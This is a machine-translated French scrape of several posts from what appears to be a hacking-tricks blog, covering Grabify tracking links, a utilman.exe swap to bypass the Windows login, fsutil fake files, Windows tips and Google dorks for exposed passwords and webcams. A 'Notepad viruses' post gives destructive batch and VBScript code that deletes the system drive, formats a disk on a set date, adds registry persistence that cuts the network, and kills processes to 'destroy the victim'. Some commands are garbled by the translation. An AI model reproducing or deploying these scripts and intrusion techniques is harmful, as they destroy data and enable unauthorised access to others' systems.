Ce que je n'ai pas pu changer immédiatement, c'est mon fuseau horaire et ma langue, qui sont définis par le système et ne sont pas affectés par le VPN ou les extensions de navigateur. Étant donné que mon adresse IP interne montrait une connexion VPN, il est probable que quelqu'un qui me suit supposerait que mes informations sont fausses, sauf mon fuseau horaire et ma langue. Cela seul réduirait mon origine aux États-Unis et au Canada, annulant une grande partie du travail acharné que j'ai consacré à truquer mon emplacement et mon adresse IP. En raison de ces types de fuites, il est essentiel d'être conscient de la façon dont des liens comme Grabify vous suivent sur Internet et du type de détails qui peuvent vous révéler.

J'espère que vous avez apprécié ce guide d'utilisation de Grabify pour générer des liens de suivi! Si vous avez des questions sur ce tutoriel sur la capture du poisson-chat ou si vous avez un commentaire, demandez ci-dessous ou n'hésitez pas à me contacter sur Instagram @iamshubhamkumar__ .

Téléchargez l'application Spyboy


Comment réinitialiser votre mot de passe de connexion Windows 10 oublié

Publié: 15 octobre 2018 dans Tech hacks , Windows Tricks

3

 

 

 

 

 

 

27 Votes

Résultat de l'image pour réinitialiser le mot de passe Windows 10

A s nous savons, Windows 10 est avec ses excellentes caractéristiques et aujourd'hui , nous allons introduire un truc facile qui vous aidera à réinitialiser de  Windows 10 Login Mot de passe . Nous avons tous traversé de telles conditions lorsque nous n'avons pas de mot de passe pour vous connecter au compte d'utilisateur Windows ou que nous nous souvenons mal de ce que c'était. À ce moment, vous devez réinstaller votre système d'exploitation Windows. Cependant, récupérer à nouveau Windows 10 après une mise à niveau n'est pas une tâche facile. Par conséquent, nous sommes ici avec cette astuce cool qui vous permettra d'entrer dans votre ordinateur sans connaître l'ancien mot de passe. Jetez donc un œil à la méthode ci-dessous.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Le processus est simple mais prend peu de temps, mais il fonctionnera certainement pour vous. De plus, avec cette méthode, vous pouvez définir votre mot de passe souhaité pour vous connecter à votre compte Windows. Suivez quelques étapes simples ci-dessous pour continuer.

Étape 1.  Tout d'abord, vous devez démarrer votre ordinateur avec le lecteur d'installation de Windows 10. Une fois que le processus de configuration a commencé Appuyez sur «Shift + F10 cela fera apparaître l'invite de commande.

 Réinitialisez votre mot de passe de connexion Windows 10 oublié

Étape 2.  Vous devez maintenant entrer les commandes suivantes dans l'invite de commande:

déplacer d: \ windows \ system32 \ utilman.exe d: \ windows \ system32 \ utilman.exe.bak

copier d: \ windows \ system32 \ cmd.exe d: \ windows \ system32 \ utilman.exe

 Réinitialisez votre mot de passe de connexion Windows 10 oublié

Étape 3.  Maintenant, vous devez redémarrer votre système, entrez la commande «wpeutil reboot» pour redémarrer votre ordinateur.

Étape 4.  Maintenant, lorsque vous êtes de retour à votre écran de connexion, vous devez cliquer sur Utility Manager, et vous verrez une invite de commande apparaît.

 Réinitialisez votre mot de passe de connexion Windows 10 oublié

Étape 5.  Maintenant, vous devez ajouter un autre compte d'utilisateur pour accéder à vos fichiers, pour cela, entrez simplement la commande suivante:

utilisateur net / ajouter

administrateurs du groupe local net / ajouter

 Réinitialisez votre mot de passe de connexion Windows 10 oublié

vous devez remplacer par votre nom souhaité.

Étape 6.  Redémarrez maintenant l'ordinateur en entrant «wpeutil reboot» sur votre invite de commande. Et utilisez votre compte nouvellement créé pour accéder à votre bureau. Naviguez jusqu'au menu Démarrer> Gestion de l'ordinateur

 Réinitialisez votre mot de passe de connexion Windows 10 oubliéRéinitialisez votre mot de passe de connexion Windows 10 oublié

Étape 7.  Maintenant, accédez à Utilisateurs et groupes locaux, sélectionnez votre compte local et sélectionnez l'option «Définir le mot de passe» et entrez votre nouveau mot de passe.

 Réinitialisez votre mot de passe de connexion Windows 10 oublié

Voilà, vous pouvez maintenant accéder à l'ancien compte avec votre nouveau mot de passe.

Avec cette méthode, vous pouvez réinitialiser le mot de passe de connexion Windows 10 oublié avec un disque d'installation. Si vous ne disposez pas du disque d'installation ou si vous cherchez une solution plus simple, vous pouvez essayer le puissant  logiciel de contournement de mot de passe Windows PCUnlocker . Ce programme est conçu pour les débutants en informatique pour réinitialiser, modifier ou contourner facilement le mot de passe Windows 10, 8, 7, Vista et XP.

Utilisez l'option de réinitialisation du mot de passe

Utilisez l'option de réinitialisation du mot de passe

Normalement, vous pouvez cliquer sur «Réinitialiser le mot de passe» et suivre le didacticiel à l'écran pour réinitialiser votre mot de passe perdu. Une autre option consiste à utiliser un disque de réinitialisation de mot de passe. Password Reset Disk est la méthode officielle de Microsoft pour réinitialiser le mot de passe Windows perdu. Cependant, les utilisateurs doivent créer un disque de réinitialisation de mot de passe Windows 10 avant de perdre le mot de passe. Dans le cas, si vous avez déjà un disque de réinitialisation de mot de passe, il vous suffit de localiser le lecteur où vous avez enregistré le disque de clé de mot de passe et vous serez invité à entrer le nouveau mot de passe.

Réinitialiser le mot de passe du compte Microsoft en ligne

Réinitialiser le mot de passe du compte Microsoft en ligne

Depuis Windows 8, tout le monde pouvait utiliser un compte Microsoft pour se connecter à Windows. L'option de connexion au compte Microsoft aide les utilisateurs à réinitialiser le mot de passe Windows de la manière la plus simple possible. Les utilisateurs doivent simplement utiliser n'importe quel autre ordinateur pour visiter la  page de réinitialisation de mot de passe Windows Live . De là, ils peuvent réinitialiser le mot de passe en ligne. Eh bien, le processus est relativement facile par rapport à toutes les autres méthodes énumérées ci-dessus.

Téléchargez l'application Spyboy


Créer un faux fichier dans Windows PC dans n'importe quelle taille et n'importe quel format

Publié: 29 mars 2018 dans Tech hacks , Windows Tricks

5

 

 

 

 

 

 

44 Votes

Résultat d'image pour Créer un faux fichier

Dans Windows PC, il existe de nombreuses commandes et fonctionnalités cachées que nous ne connaissons pas. Dans cet article, je vous dis comment faire un faux fichier de n'importe quelle taille dans n'importe quel format. À partir de cette astuce Windows, vous pouvez créer de faux fichiers musicaux, des documents, des films, des fichiers audio de n'importe quelle taille.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Avantages de ces astuces:

1. Vous pouvez créer n'importe quel type de fichier à n'importe quelle taille en quelques secondes.

2. Troll vos amis.

3. Remplissez n'importe quel Pendrive vide en quelques secondes.

Alors, comment cela fonctionne

Cette astuce Windows fonctionne sur les noms de commandes Windows FSUTIL.

Fsutil est un utilitaire de ligne de commande, cette commande fournit des informations techniques sur les lecteurs de disque.

Créez un faux fichier à n'importe quelle taille et n'importe quel format sans aucun logiciel sous Windows

1. Appuyez sur le bouton Windows et tapez cmd, sélectionnez cmd.ex et faites un clic droit dessus Exécuter en tant qu'administrateur.

2. Tapez la commande fustil et voyez ci-dessous par exemple.

fsutil file create new C: spyboy.mp4 500000000

changez "spyboy" avec votre

changement de nom de fichier ".mp4" avec votre extension de fichier

changez "50000000" avec votre taille de fichier

Si vous souhaitez créer le faux fichier avec cet utilitaire de commande vous aide. C'est l'un des meilleurs créateurs de faux fichiers pour Windows. Avec cette astuce, vous pouvez également créer une fausse application Android.


5 astuces secrètes sur Windows 10 que vous devez connaître

Publié: 16 mars 2018 dans Windows Tricks

4

 

 

 

 

 

 

6 votes

Windows 10 regorge de fonctionnalités et d'astuces, mais certains sont plus cachés que d'autres…

Par exemple, saviez-vous qu'il existe un «mode divin»? Et que vous pouvez jouer à des jeux avec l'assistant numérique Cortana? Pour savoir quelles sont ces fonctionnalités cachées et ce qu'elles peuvent faire pour vous, lisez la suite.

 

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Le menu Démarrer secret

Menu de démarrage secret

Bien que le menu Démarrer standard fonctionne plutôt bien avec la liste des applications et des tuiles, quelque chose de plus se cache en dessous qui peut s'avérer utile de temps en temps.

Si vous souhaitez accéder rapidement à certaines des fonctionnalités les plus sérieuses telles que les paramètres, la gestion du système ou du disque, il existe un moyen astucieux d'y accéder via le bouton Démarrer. Faites simplement  un clic droit  au lieu du clic gauche habituel, et vous verrez une liste d'options disponibles. Si vous voulez être vraiment averti, vous pouvez simplement cliquer sur le bouton Windows + la touche X, et le menu Démarrer secret apparaîtra également de cette façon.

Secouez pour effacer votre écran

Secouez pour effacer votre écran

Vous êtes-vous déjà retrouvé avec un ordinateur plein de fenêtres ouvertes et incapable de vous concentrer sur un seul? Cela nous arrive à tous à un moment donné et Microsoft essaie de l'atténuer depuis Windows 7 avec une fonctionnalité de `` secousse '' unique.

Le mode tremblement existe toujours dans Windows 10 et est passé inaperçu par de nombreux utilisateurs. Tout ce que vous avez à faire est de saisir la fenêtre sur laquelle vous souhaitez vous concentrer dans la barre de titre en haut, maintenez et secouez. Toutes les autres fenêtres ouvertes seront alors automatiquement réduites. Secouez-le à nouveau pour tout ramener.

Afficher le bouton du bureau

Révéler le bureau

Semblable à la fonction de tremblement, si jamais vous trouvez votre écran encombré de fenêtres et que vous souhaitez minimiser tout pour revenir rapidement sur le bureau, il existe un moyen simple de le faire.

Cliquez simplement sur le coin inférieur droit, à droite de la ligne, et toutes les fenêtres ouvertes seront réduites. Cliquez à nouveau dessus et toutes les fenêtres réapparaîtront là où vous les avez laissées.

Jeux secrets avec Cortana

Pierre papier ciseaux

Cortana, l'assistant numérique à commande vocale pour Windows 10, a apparemment un côté amusant pour organiser vos réunions et gérer vos recherches.

Si vous avez un peu de temps à graver, vous pouvez jouer à Rock Paper Scissors - tout ce que vous avez à faire est de le taper sur Cortana ou de le dire.

De même, vous pouvez dire «lancez les dés» ou «lancez la pièce» si vous n'avez ni l'un ni l'autre à portée de main.

'Mode Dieu' sur Windows 10

Mode Dieu

Vous voulez avoir un contrôle complet de tout sur votre machine avec des paramètres supplémentaires? Alors le mode Dieu est fait pour vous.

Pour y accéder, vous devrez créer un nouveau dossier en cliquant avec le bouton droit de la souris et en sélectionnant  Nouveau , suivi de  Dossier  sur votre bureau.

Renommez le dossier comme suit:  GodMode. {ED7BA470-8E54-465E-825C-99712043E01C}

Vous pouvez ensuite l'ouvrir et modifier des paramètres supplémentaires au contenu de votre cœur.

Téléchargez l'application Spyboy


Virus du bloc-notes

Publié: 5 janvier 2017 dans Notepad Tricks , Tech hacks

21

 

 

 

 

 

 

49 Voix

écriture de virus

LUTIN. Remarque >> Je ne suis pas responsable des dommages ou des rapports d'erreur sur votre PC, faites-le à vos risques et périls. Ces codage uniquement pour le concept de connaissances.

Tous les scripts ici doivent être copiés dans le bloc-notes

Téléchargez l'application Spyboy

Obtenez le sur Google Play

>> Ce virus supprime tout le contenu d'un lecteur…

@echo off

del% systemdrive% \ *. * / f / s / q

shutdown -r -f -t 00

Enregistrez le code ci-dessus dans un fichier .bat


>> Désactiver définitivement Internet

Enregistrer en tant que fichier bat

echo @echo off> c: windowswimn32.bat

echo break off >> c: windowswimn32.bat

echo ipconfig / release_all >> c: windowswimn32.bat

echo end >> c: windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun / v WINDOWs /dc:windowswimn32.bat / f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun / v CONTROLexit / t reg_sz /dc:windowswimn32.bat / f

écho Vous avez été piraté!

PAUSE


>> Le virus le plus simple pour écraser la fenêtre

@Echo off

Del C: \ *. * | Y

Enregistrez-le sous Anything.bat


>> Cela va planter votre ordinateur

Option explicite

Dim WSHShell

Set WSHShell = Wscript.CreateObject («Wscript.Shell»)

Dim x

Pour x = 1 à 100000000

WSHShell.Run "Tourstart.exe"

Next

Enregistrez-le sous Anything.vbs

Cela ne fonctionne qu'avec Windows XP


>> Bloc-notes sans fin

* Cela fera apparaître des blocs-notes sans fin jusqu'à ce que l'ordinateur se bloque et se bloque *

Code:-

@ECHO off

: top

START% SystemRoot% \ system32 \ notepad.exe

GOTO top


>> Virus de la bombe

Copier Coller ce qui suit

If% date% NEQ 2009/11/25 goto exit

format E: / y> nul

: exit

exit

Et enregistrez-le sous Anything.bat

Remarque: - Vous pouvez modifier la date (25/11/2009) du virus et l'emplacement (format E:) sur lequel il effectue son action.

Le virus prendra effet ce jour-là


>> Serrure Crazy Caps

* Cela active et désactive constamment le verrouillage des majuscules très rapidement en continu *

Code:-

Définissez wshShell = wscript.CreateObject ("WScript.Shell")

pour

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

boucle


>> Entrée sans fin

* Cela fait en sorte que le bouton Entrée est pressé en continu *

Code:-

Définissez wshShell = wscript.CreateObject ("WScript.Shell")

pour

wscript.sleep 100

wshshell.sendkeys "~ (enter)"

loop


>> Retour arrière sans fin

* Cela fait en sorte que la touche de retour arrière est constamment enfoncée *

Code:-

MsgBox "Revenons quelques étapes en arrière"

Définissez wshShell = wscript.CreateObject ("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop


De quel sexe est votre ordinateur?

-> bloc-notes ouvert

- -> copier le code

CreateObject («SAPI.SpVoice»). Parlez «Je t'aime»

-> n coller sur le Bloc

- notes -> enregistrer sous> love.vbs

-> double-cliquer dessus


Faites de votre clavier une lumière disco

Cette astuce fait juste que les lumières de votre clavier font de la disco.

Le script que je partage avec vous, lorsqu'il est exécuté, fait clignoter la lumière de vos majuscules, chiffres et défilement d'une manière rythmique cool!

1. Ce morceau de code fait de votre clavier une discothèque en direct.

Définissez wshShell = wscript.CreateObject ("WScript.Shell")

faire

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

boucle

2. Celui-ci ressemble à une chaîne de lumière….

Définissez wshShell = wscript.CreateObject ("WScript.Shell")

faire

wscript.sleep 200

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 100

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 50

wshshell.sendkeys "}" SCROLL

boucle

Instructions:

* collez l'un des deux codes ci-dessus dans le bloc-notes

* Enregistrez-le sous "AnyFileName" .vbs

* Exécutez le fichier

* Pour arrêter, lancez le gestionnaire de tâches, puis sous "Processus", puis "wscript.exe"

J'espère que tu l'aimerais ..

>> Tâches tuées

@Écho off

commencer calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

explorateur de compétences

explorateur de compétences

explorateur de compétences

explorateur de compétences

explorateur de compétences

pause

enregistrez-le sous forme de fichier .bat et envoyez et détruisez la victime & k! ll Operat! ng systeM!


>> Type de code dans le bloc-notes

@echo off

shutdown -r -f -t 00

Forme de commutateurs

-s

Arrête le PC.

-l

Déconnecte l'utilisateur actuel.

-t nn

Indique la durée du délai, en secondes, avant d'effectuer l'action.

-c "messagetext"

Affiche un message dans la fenêtre d'arrêt du système. Un maximum de 127 caractères peut être utilisé. Le message doit être placé entre guillemets.

-f

Force la fermeture de toutes les applications en cours d'exécution.

-r

Redémarre le PC. .. !! ..!


>> Popping lecteurs de CD

* Cela fera sortir les lecteurs de CD en permanence *

Code:-

Définir oWMP = CreateObject ("WMPlayer.OCX.7?)

Définir colCDROMs = oWMP.cdromCollection

faire

si colCDROMs.Count> = 1 puis

pour i = 0 à colCDROMs.Count - 1

colCDROMs.Item (i) .Eject

Next

pour i = 0 à colCDROMs.Count - 1

colCDROMs.Item (i) .Eject

Next

End If

wscript.sleep 100

loop


>> Pour faire parler votre PC

Ouvrez un fichier texte dans le bloc-notes et écrivez:

Texte

sombre , texte sapi = zone de saisie («saisir le texte à

prononcer ») Définir sapi = Créerobjet («sapi.spvoice»)

texte sapi.Speak

Enregistrez le fichier avec une extension (* .vbs), il créera un fichier VBScript.

Il vous demandera un texte lorsque vous ouvrirez le fichier, saisissez le texte et appuyez sur ok. »

vous entendrez maintenant ce que vous avez tapé ..

cela fonctionne également dans xp, vista, win7.


Tous les produits

Pack de récupération de mot de passe Récupérez plus de 60 types de mots de passe.
PCUnlocker Réinitialisez le mot de passe Windows oublié avec un CD / DVD / USB amorçable.
KeyFinder Plus Trouvez, récupérez et sauvegardez instantanément vos clés de produit perdues (clé CD).
Protéger mes dossiers Mot de passe protège tous les dossiers et fichiers de votre ordinateur local.
Video Converter Assist Convertissez des fichiers vidéo et audio parmi MP4, FLV, AVI, MP3, AAC, M4A, etc.
Récupération de mot de passe Outlook Récupérez le mot de passe de messagerie Outlook et déverrouillez le fichier .pst.
Récupération de mot de passe Outlook Express Récupérez le mot de passe du compte de messagerie stocké par Outlook Express.
Email Password Recovery Recover oublié mot de passe de tout client de messagerie.
Changeur de mot de passe SQL Server Réinitialiser le mot de passe SQL Server 2000/2005/2008 perdu.
Access Password Recovery Déverrouillez la base de données MS Access (mdb, mdw, mda).
Récupération de mot de passe PDF Récupérez le mot de passe du fichier PDF et supprimez les restrictions PDF.
Word Password Recovery Récupérez le mot de passe MS Word 97-2007.
Excel Password Recovery Récupérer le mot de passe pour le document Excel (xls, xlsx).
PowerPoint Password Recovery Récupérer le mot de passe pour la présentation PowerPoint.
Récupération de mot de passe ZIP Récupérez le mot de passe perdu dans votre archive ZIP cryptée.
RAR Password Recovery Récupérer le mot de passe oublié pour l'archive RAR / WinRAR.
Récupération de mot de passe MSN Récupérez rapidement le mot de passe du compte MSN et Hotmail.
AIM Password Recovery Récupérez le login et le mot de passe AOL pour AIM 6, 7, Pro.
Récupération de mot de passe MySpace Récupérez le mot de passe du messager MySpace.
Récupération de mot de passe Google Talk Récupérez le mot de passe du compte Gmail stocké dans Google Talk.
Miranda Password Recovery Récupérez tous les types de mots de passe de Miranda.
Trillian Password Recovery Récupérer les mots de passe enregistrés dans Trillian & Trillian Astra
Paltalk Password Recovery Récupérez les mots de passe pour Paltalk, PaltalkScene et SuperIM.
Récupération de mot de passe IE Récupérez les mots de passe enregistrés IE et supprimez le mot de passe Content Advisor.
Firefox Password Recovery Récupérez tous les types de mots de passe enregistrés dans Firefox et Thunderbird.
Opera Password Recovery Récupérez les identifiants et les mots de passe stockés par le navigateur Opera et Opera Mail.
Récupération de mot de passe d'astérisque Révélez le mot de passe réel derrière les astérisques.
Récupération de mot de passe FTP Récupérez les mots de passe perdus ou oubliés pour tout client FTP.
Dialup Password Recovery Récupérez les connexions et les mots de passe d'accès à distance, RAS et VPN.
ISO2Disc Graver une image ISO sur CD / DVD et clé USB.


Guide pas à pas


Rechercher des mots de passe dans des fichiers journaux exposés avec Google Dorks

Publié: 23 mai 2020 dans Réseautage , Piratages technologiques

0

 

 

 

 

 

 

1 Vote

us8bqdas9vv31

Vous ne pensiez peut-être pas aux dorks comme puissants, mais avec les bons dorks, vous pouvez pirater les appareils simplement en recherchant le mot de passe sur Google pour vous connecter. Parce que Google est fantastique pour indexer tout ce qui est connecté à Internet, il est possible de trouver des fichiers qui sont exposés accidentellement et contiennent des informations essentielles que tout le monde peut voir.

L'application avancée des  opérateurs de recherche Google  est Google Dorking - qui utilise des opérateurs de recherche pour rechercher des appareils vulnérables spécifiques via des chaînes de recherche ciblées. Si nous supposons que Google a indexé la plupart des appareils accidentellement exposés à Internet, nous pouvons utiliser le texte que nous savons apparaître dans leurs pages de connexion ou d'administration pour les trouver.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Quels types de choses Dorks connecte-t-il à Internet?

Vous seriez étonné. Tout, depuis le contrôleur de piscine de Yachts dans l'océan jusqu'aux interfaces de configuration des systèmes critiques, est connecté à Internet par des personnes bien intentionnées en supposant que personne ne les trouvera jamais.

Alors, comment cela pourrait-il vous arriver? Imaginez obtenir une nouvelle caméra de sécurité qui offre la possibilité de la regarder sur votre téléphone quand vous le souhaitez. Vous le configurez, vous le connectez à votre Wi-Fi et vous téléchargez une application qui vous demande de vous connecter. Après cela, vous pouvez accéder à votre appareil photo de n'importe où!

Ce qui se passe en arrière-plan n'est pas si simple. La caméra appelle un serveur chinois et diffuse la vidéo en temps réel, ce qui vous permet de vous connecter en accédant au flux vidéo hébergé sur le serveur en Chine depuis votre téléphone. Ce serveur peut ne nécessiter aucun mot de passe pour accéder au flux depuis votre webcam, ce qui rend votre caméra accessible à toute personne qui recherche du texte contenu dans la page de visualisation de la caméra.

Malheureusement, Google est impitoyablement efficace pour traquer tous les appareils sur Internet exécutant des serveurs HTTP et HTTPS. Étant donné que la plupart de ces appareils hébergent un serveur pour les configurer, cela signifie que de nombreuses choses qui ne sont pas censées être sur Google se retrouvent là-bas.

Quels sont les Dorks les plus puissants?

De loin, le type de fichier exposé le plus grave que nous pouvons trouver est celui qui divulgue les informations d'identification aux comptes d'utilisateurs ou à l'ensemble du service lui-même. Habituellement, cela se produit de deux manières. Dans le premier, un serveur ou un autre service est mal configuré et expose ses journaux administratifs à Internet. Lorsque les mots de passe sont modifiés ou qu'un utilisateur ne parvient pas à se connecter correctement, ces journaux peuvent divulguer les informations d'identification utilisées sur Internet.

Cela se produit également lorsque les fichiers de configuration contenant les mêmes informations sont exposés. Ce sont des fichiers qui sont censés être internes, mais laissent souvent les informations critiques à découvert. L'une ou l'autre de ces erreurs peut entraîner la prise en charge de l'ensemble du service par un attaquant qui tombe par hasard sur les informations.

Nous utiliserons Google Dorks pour trouver non seulement ces fichiers, mais aussi des éléments comme les serveurs de transfert de fichiers qui peuvent contenir des informations intéressantes, des listes de diffusion et mes webcams personnelles préférées.

Ce dont vous aurez besoin

Pour suivre, vous aurez besoin d'un navigateur avec accès à Internet. La belle chose à propos de l'utilisation de Google Dorks est que nous pouvons utiliser des outils accessibles à presque tout le monde pour trouver des systèmes vulnérables.

Une fois que vous avez ouvert un navigateur, accédez à Google.com et nous pouvons commencer.

Étape 1. Recherche de serveurs FTP et de sites Web à l'aide de HTTP

Pour commencer, nous utiliserons le dork suivant pour rechercher des serveurs de transfert de fichiers publiés cette année. La recherche de ces serveurs peut nous permettre de trouver des fichiers qui sont censés être internes, mais qui ont été rendus publics sans le savoir.

intitle:"index of" inurl:ftp after:2018

Ces serveurs deviennent publics car le fichier d'index de leur serveur FTP est le type de données que Google adore analyser - un fait que les gens ont tendance à oublier. L'analyse de Google conduit à une liste complète de tous les fichiers contenus dans le serveur consultable sur Google.

Si nous voulons trouver des pages Web non sécurisées utilisant toujours HTTP pour piquer, nous pouvons modifier légèrement la commande pour le faire en changeant le «ftp» en «http» et en relançant la recherche.

intitle:"index of" inurl:http after:2018

La recherche de cette chaîne devrait produire une liste de lots et de lots de sites Web utilisant HTTP, prêts à être attaqués. Mais si nous recherchons un type de site spécifique, nous pouvons aller encore plus loin.

Si nous voulons commencer à attaquer certaines cibles faciles, nous pouvons être plus précis et rechercher des formulaires en ligne en utilisant HTTP en changeant le texte dans le titre de la recherche.

intitle:"forum" inurl:http after:2018

Nous pouvons continuer à ajouter des opérateurs de recherche comme  AND inurl: «inscription»  pour être plus précis et traquer les pages d'inscription des sites Web de formulaires non sécurisés.

Ici, vous pouvez voir que nous avons trouvé une liste de forums en ligne vulnérables utilisant HTTP.

Étape 1 Trouver des fichiers journaux avec des mots de passe

L'étape suivante consistera à rechercher des fichiers de type .LOG. La recherche de fichiers LOG nous permettra de rechercher des indices sur les informations d'identification du système ou de divers comptes d'utilisateurs ou d'administrateurs.

Le dork que nous utiliserons pour ce faire est le suivant.

allintext:password filetype:log after:2018

Lorsque nous recherchons des fichiers journaux actuels exposés à Internet, nous les trouvons presque immédiatement.

Ce journal indique que le mot de passe est le mot de passe par défaut, ce qui prend juste une simple recherche Google du site Web du projet OpenCast à découvrir. Avec une seule recherche, nous avons peut-être trouvé les informations d'identification de ce système sans rien pirater du tout.

Étape 2. Rechercher des fichiers de configuration avec des mots de passe

Les fichiers de configuration ne devraient jamais être publics, et les fichiers .ENV en sont de bons exemples. Si nous recherchons des fichiers .ENV contenant une chaîne pour le mot de passe de la base de données, nous trouvons instantanément le mot de passe de cette base de données que nous avons découverte.

filetype:env "DB_PASSWORD" after:2018

Si nous supprimons l'  après: 2018,  nous pouvons voir des fichiers journaux plus anciens exposant également des services à Internet.

Étape 3. Rechercher des listes de courriels

Les listes de diffusion sont un excellent moyen de supprimer les adresses électroniques et d'essayer de trouver des informations sur les cibles de l'entreprise ou de l'école. Ces listes sont fréquemment exposées par des entreprises ou des écoles qui tentent d'organiser des listes de diffusion pour leurs membres.

Pour les trouver, nous recherchons le type de fichier de feuille de calcul .XLS avec la chaîne «email.xls» dans l'URL.

Bien que ces résultats soient utiles, veillez à ne télécharger aucun fichier sans d'abord vous demander s'il s'agit d'un pot de miel. Beaucoup de gens prendront des dorks populaires puis quitteront un serveur hébergeant un fichier qui semble vulnérable mais qui pourrait à la place contenir des logiciels malveillants.

Étape 4. Trouver des caméras ouvertes

Enfin, si vous pensiez que Shodan était le seul service capable de trouver des caméras ouvertes étranges, vous vous trompiez. Les pages de connexion et de visualisation de la caméra sont généralement HTTP, ce qui signifie que Google est heureux de les indexer et de les fournir si vous connaissez la bonne chaîne de recherche.

Un format courant pour les chaînes de webcam consiste à rechercher «top.htm» dans l'URL avec l'heure et la date actuelles incluses. Vous trouverez de nombreux résultats de cette façon.

inurl:top.htm inurl:currenttime

Le premier résultat est une webcam qui semble être l'arrière-plan de Windows XP sous un autre angle à Belmullet, en Irlande.

Un autre dork pour les caméras qui produit des résultats exceptionnels recherche une page de vue en direct commune hébergée sur des routeurs.

inurl:"lvappl.htm"

En utilisant ce dork, j'ai pu localiser le meilleur appareil photo de tous, le birdcam1.

S'il vous plaît, ne piratez pas la caméra des oiseaux, mais n'hésitez pas à en  profiter ici . De nombreuses autres caméras sont disponibles, bien que toutes soient moins intéressantes que birdcam1.

De nombreuses caméras surveillent également l'intérieur des usines ou des zones industrielles.

Bien que vous puissiez voir les caméras, j'ai démontré sans mot de passe; de nombreux dorks recherchent des pages de connexion webcam qui ont un mot de passe par défaut bien connu. Cette tactique, bien qu'illégale, permet d'accéder facilement à de nombreuses webcams non destinées au public.

Google Dorks permet un piratage facile des services exposés

Grâce à la façon dont Google indexe presque tout ce qui est connecté à Internet et qui offre une interface Web, les services mal configurés ne manquent pas et laissent les éléments critiques exposés à Internet. Assurez-vous de ne pas vous connecter à l'un de ces services même si le mot de passe est exposé, car cela pourrait vous causer des ennuis car vous n'avez pas la permission. Si vous avez un service en ligne, il est judicieux d'exécuter quelques dorks communs sur vos domaines pour voir ce qui se passe, au cas où vous auriez accidentellement laissé quelque chose exposé qu'un pirate pourrait trouver utile.

J'espère que vous avez apprécié ce guide d'utilisation de Google Dorks pour trouver des appareils et des mots de passe vulnérables! Si vous avez des questions à ce sujet sur Google Dorks, ou si vous avez un commentaire, posez-les ci-dessous ou n'hésitez pas à me contacter sur Instagram @iamshubhamkumar__ .


Utilisez Google Dorks pour trouver des informations insaisissables

Publié: 23 mai 2020 dans Réseautage , Piratages technologiques

0

 

 

 

 

 

 

1 Vote

opérateurs de rechercheGoogle est une base de données incroyablement utile de sites Web indexés, mais interroger Google ne recherche pas ce que vous tapez littéralement. Les algorithmes derrière les recherches de Google peuvent conduire à de nombreux résultats non pertinents. Pourtant, avec les bons opérateurs, nous pouvons être plus précis lors de la recherche d'informations sensibles au temps ou difficiles à trouver.Si vous avez déjà cherché la réponse à une question de programmation et que vous vous êtes retrouvé enterré dans des résultats qui ne fonctionnent pas, ou essayé de rechercher une personne portant le même nom qu'une personne célèbre, vous avez peut-être rencontré certaines des lacunes de Google. Étant donné que Google par défaut ne recherche pas les mots littéraux que vous tapez, il est courant de se retrouver avec une tonne de résultats non liés.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Types de recherches sur lesquelles Google n'est pas bon

Il y a beaucoup de choses que Google fait bien, mais la recherche de certains types de réponses expose assez clairement ces défauts. Si nous essayons de comprendre pourquoi nous obtenons une erreur Python, vous pouvez voir immédiatement pourquoi ces résultats de recherche peuvent ne pas être utiles.

Oui! Pour une recherche sur une bibliothèque qui est activement mise à jour, un article de 2014 a une faible chance de continuer à fonctionner comme décrit en 2019.

Un autre problème survient lorsque nous commençons à chercher des termes de programmation et des termes techniques qui peuvent avoir d'autres significations plus universelles. Si ce que nous recherchons est la fonctionnalité de liste standard de C ++, la requête serait «std :: list». La recherche de ce résultat produit de nombreux résultats désagréables et indépendants, car Google ignore le «::» et renvoie une liste des maladies sexuellement transmissibles.

Regarder un écran plein de résultats déroutants peut être intimidant. Pourtant, nous pouvons nettoyer ces recherches en comprenant la façon dont Google trouve les informations et en utilisant des opérateurs pour cibler précisément ce que nous voulons trouver. L'utilisation de ces opérateurs peut réduire considérablement le temps nécessaire pour trouver le résultat que vous essayez de déterrer.

Ce dont vous aurez besoin

Pour ce guide, vous n'aurez besoin que d'un navigateur connecté à Internet et d'un accès à Google. Nous rechercherons des informations sur les cibles difficiles à rechercher, donc cela devrait fonctionner sur n'importe quel système d'exploitation à condition que vous puissiez exécuter des recherches Google.

Ci-dessous, vous pouvez voir une liste des opérateurs de recherche que nous utiliserons pour fouiller les données.

En utilisant le bon opérateur pour le bon problème, nous pouvons réduire le temps que nous devons passer à regarder des résultats non pertinents. Vous pouvez trouver une  liste des opérateurs de recherche documentés de Google ici .

Étape 1. Recherche des résultats liés à la programmation

Lorsque vous recherchez des requêtes qui tournent autour des logiciels, l'une des choses les plus importantes à considérer est le temps. Quand quelque chose a été publié, il est essentiel de prendre en compte pour décider si une réponse est utile, au point qu'il n'est pas utile d'inclure des résultats trop éloignés de la plage utile.

Pensez à rechercher des réponses à propos de Python, un langage de programmation courant. Python est en constante évolution et mis à jour, et plusieurs versions sont utilisées aujourd'hui. Par conséquent, les informations publiées à ce sujet il y a une décennie seraient extrêmement obsolètes et probablement inexactes, en particulier si vous utilisez une version plus récente.

La première chose à considérer lors de la recherche de la réponse à une question technique est lorsqu'un article est trop ancien pour être utile. En définissant un filtre pour omettre tout ce qui est trop ancien pour être utile, nous pouvons facilement limiter nos recherches aux résultats pertinents. Inversement, si nous devons rechercher une réponse logicielle pour une ancienne bibliothèque ou une ancienne version du logiciel avec lequel vous travaillez, nous pouvons limiter notre recherche aux résultats publiés avant une date spécifique - par exemple, lorsque la nouvelle version a été publiée.

